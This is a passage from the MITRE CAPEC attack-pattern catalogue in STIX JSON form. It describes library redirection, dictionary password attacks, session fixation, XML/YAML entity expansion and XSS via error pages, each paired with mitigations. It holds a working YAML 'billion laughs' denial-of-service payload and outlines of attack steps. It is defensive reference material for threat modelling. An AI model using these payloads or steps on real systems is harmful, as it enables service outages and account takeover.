  1. Deploy Malicious Libraries: The adversary crafts malicious libraries and deploys them on the system where the application is running, or in a remote location that can be loaded by the application.

Exploit

  1. Redirect Library Calls to Malicious Library: Once the malicious library crafted by the adversary is deployed, the adversary will manipulate the flow of the application such that it calls the malicious library. This can be done in a variety of ways based on how the application is loading and calling libraries.

  2. Techniques
    Poison the DNS cache of the system so that it loads a malicious library from a remote location hosted by the adversary instead of the legitimate location
    Create a symlink that tricks the application into thinking that a malicious library is the legitimate library.
    Use DLL side-loading to place a malicious verison of a DLL in the windows directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--7cb5458d-b646-4a25-ad0a-4c3fabd70a65", + "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328" + ], + "x_capec_prerequisites": [ + "The target must utilize external libraries and must fail to verify the integrity of these libraries before using them." + ], + "x_capec_skills_required": { + "High": "To reverse engineering the libraries and inject malicious code into the libraries", + "Low": "To modify the entries in the configuration file pointing to malicious libraries", + "Medium": "To force symlink and timing issues for redirecting access to libraries" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Restrict the permission to modify the entries in the configuration file.", + "id": "course-of-action--f26a4acf-baf0-4bf2-a143-bc1b7c62e85f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd6337df-a7bd-4afe-b168-4189a828cafb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f26a4acf-baf0-4bf2-a143-bc1b7c62e85f", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Check the integrity of the dynamically linked libraries before use them.", + "id": "course-of-action--3654cbd2-7f0f-4ca2-8104-ac4038549426", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--34ed3417-5e22-490d-b967-b77e3be13f50", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3654cbd2-7f0f-4ca2-8104-ac4038549426", + "target_ref": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries.", + "id": "course-of-action--3b7c420e-04b7-4432-90f3-cdcec1a162cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-159-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--915e2bb6-c5cc-4d8c-b3f9-062b7c13ead4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b7c420e-04b7-4432-90f3-cdcec1a162cb", + "target_ref": 
"attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.\n ", + "external_references": [ + { + "external_id": "CAPEC-16", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/16.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + } + ], + "id": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Dictionary-based Password Attack", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A system user selects the word \"treacherous\" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.", + "\n The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.\n Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user's logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.\n Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. 
The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques.See also: CVE-2003-1096" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

  2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).
  3. Select dictionaries: Pick the dictionaries to be used in the attack (e.g. different languages, specific terminology, etc.)

  4. Techniques
    Select dictionary based on particular users' preferred languages.
    Select dictionary based on the application/system's supported languages.
  5. Determine username(s) to target: Determine username(s) whose passwords to crack.

  6. Techniques
    Obtain username(s) by sniffing network packets.
    Obtain username(s) by querying application/system (e.g. if upon a failed login attempt, the system indicates whether the entered username was valid or not)
    Obtain usernames from filesystem (e.g. list of directories in C:\\Documents and Settings\\ in Windows, and list in /etc/passwd in UNIX-like systems)

Exploit

  1. Use dictionary to crack passwords.: Use a password cracking tool that will leverage the dictionary to feed passwords to the system and see if they work.

  2. Techniques
    Try all words in the dictionary, as well as common misspellings of the words as passwords for the chosen username(s).
    Try common combinations of words in the dictionary, as well as common misspellings of the combinations as passwords for the chosen username(s).
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system uses one factor password based authentication.", + "The system does not have a sound password policy that is being enforced.", + "The system does not implement an effective password throttling mechanism." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A variety of password cracking tools and dictionaries are available to launch this type of an attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Create a strong password policy and ensure that your system enforces this policy.", + "id": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": 
"Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.", + "id": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e58b5f0-7d1d-48bc-bbfd-a15472142005", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services.", + "id": "course-of-action--4e15baee-dc2c-4af0-bad4-f2a1fd8a7000", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--21bb6f85-66f5-41e1-b24b-9ad75b3f1526", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e15baee-dc2c-4af0-bad4-f2a1fd8a7000", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + 
"type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support \n A similar example uses session ID as an argument of the URL.\n http://www.example.com/index.php/sessionid=0123456789\n Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim's session.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Analyze and Understand Session IDs: The attacker finds that the targeted application use session credentials to identify legitimate users.

  2. Techniques
    An attacker makes many anonymous connections and records the session IDs.
    An attacker makes authorized connections and records the session tokens or credentials.

Experiment

  1. Create Session IDs.: Attackers craft messages containing their forged credentials in GET, POST request, HTTP headers or cookies.

  2. Techniques
    The attacker manipulates the HTTP request message and adds their forged session IDs in to the requests or cookies.

Exploit

  1. Abuse the Victim's Session Credentials: The attacker fixates falsified session ID to the victim when victim access the system. Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the forged session identifier.

  2. Techniques
    The attacker loads the predefined or predicted session ID into their browser and browses to protected data or functionality.
    The attacker loads the predefined or predicted session ID into their software and utilizes functionality with the rights of the victim.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810" + ], + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users. Session identifiers that remains unchanged when the privilege levels change. Predictable session identifiers." + ], + "x_capec_resources_required": [ + "Attackers may require tools to craft messages containing their forged credentials, and ability to send HTTP request to a web application." + ], + "x_capec_skills_required": { + "Medium": "Forge the session credential and reply the request." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. 
By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", + "id": "course-of-action--aba24572-8817-4d88-92bf-765eaa6ae508", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-196-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7fe664e-53db-4afa-acf9-45a9386c846a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aba24572-8817-4d88-92bf-765eaa6ae508", + "target_ref": "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", + "id": "course-of-action--9403f5e9-5529-4e19-8b52-23c80494dc87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-196-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7122b06c-8e94-4304-88f8-5f9d5c620b25", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--9403f5e9-5529-4e19-8b52-23c80494dc87", + "target_ref": "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary submits data to a target application which contains nested exponential data expansion to produce excessively large output. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.", + "external_references": [ + { + "external_id": "CAPEC-197", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/197.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-776", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/776.html" + }, + { + "description": "XML Entity Expansion", + "external_id": "44", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Entity-Expansion" + }, + { + "description": "Amit Klein, Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD", + "external_id": "REF-64", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/archive/1/303509" + }, + { + "description": "Pete Lindstrom, Attacking & Defending Web Services, 2002, SPiRE Security", + "external_id": "REF-65", + "source_name": "reference_from_CAPEC", + "url": "http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf" + }, + { + "description": "Elliotte Rusty Harold, Tip: Configure SAX parsers for secure processing, IBM developerWorks, 2005--05---27, IBM", + 
"external_id": "REF-66", + "source_name": "reference_from_CAPEC", + "url": "http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html" + }, + { + "description": "Bryan Sullivan, XML Denial of Service Attacks and Defenses", + "external_id": "REF-67", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-us/magazine/ee335713.aspx" + }, + { + "description": "Bryan Sullivan, XML Denial of Service Attacks and Defenses", + "external_id": "REF-67", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-us/magazine/ee335713.aspx" + } + ], + "id": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exponential Data Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Billion Laughs Attack", + "XML Bomb", + "XML Entity Expansion (XEE)" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Denial of Service)", + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The most common example of this type of attack is the \"many laughs\" attack (sometimes called the 'billion laughs' attack). For example:\n \n ]>&lol9;\n This is well formed and valid XML according to the DTD. Each entity increases the number entities by a factor of 10. The line of XML containing lol9; expands out exponentially to a message with 10^9 entities. A small message of a few KBs in size can easily be expanded into a few GB of memory in the parser. 
By including 3 more entities similar to the lol9 entity in the above code to the DTD, the program could expand out over a TB as there will now be 10^12 entities. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow.\n ", + "\n This example is similar, but uses YAML. This was used to attack Kubernetes [REF-686]\n a: &a [\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\"]b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: An adversary determines the input data stream that is being processed by a data parser that supports using subsitituion on the victim's side.

  2. Techniques
    Use an automated tool to record all instances of URLs to process requests.
    Use a browser to manually explore the website and analyze how the application processes requests.

Experiment

  1. Craft malicious payload: The adversary crafts a malicious message containing nested exponential expansion that completely uses up available server resources. See the \"Example Instances\" section for details on how to craft this malicious payload.

Exploit

  1. Send the message: Send the malicious crafted message to the target URL.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This type of attack requires that the target must receive input but either fail to provide an upper limit for entity expansion or provide a limit that is so large that it does not preclude significant resource consumption." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Ability to craft nested data expansion messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.", + "id": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-197-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0492ba63-8134-4235-a371-e1cf83184a85", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "target_ref": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For XML based data - disable altogether the use of inline DTD schemas when parsing XML objects. 
If a DTD must be used, normalize, filter and use an allowlist and parse with methods and routines that will detect entity expansion from untrusted sources.", + "id": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-197-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6b369dc5-7f0d-40cb-8412-64f171649546", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "target_ref": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page.", + "external_references": [ + { + "external_id": "CAPEC-198", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/198.html" + }, + { + "external_id": "CWE-81", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/81.html" + } + ], + "id": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Targeting Error Pages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs as URL parameters: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application, looking for URLs which use parameters.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Cause application to return error page: The adversary uses the URLs gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters into the parameters to see if an error page occurs, and if the injected payload is executed by the error page.

  2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they caused errors
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS through an error page, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_extended_description": "\n When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the adversary the infected error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.\n ", + "x_capec_prerequisites": [ + "A third party web server which fails to adequately sanitize messages sent in error pages.", + "The victim must be made to execute a query crafted by the adversary which results in the infected error report." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use libraries and templates that minimize unfiltered input.", + "id": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ead6205-dacb-49ab-9007-3a8d39a3ea50", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for any input that will be used in error messages.", + "id": "course-of-action--c79cd2c1-58af-4951-8d6a-8767190e4ecd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-1", + "object_marking_refs": [ + 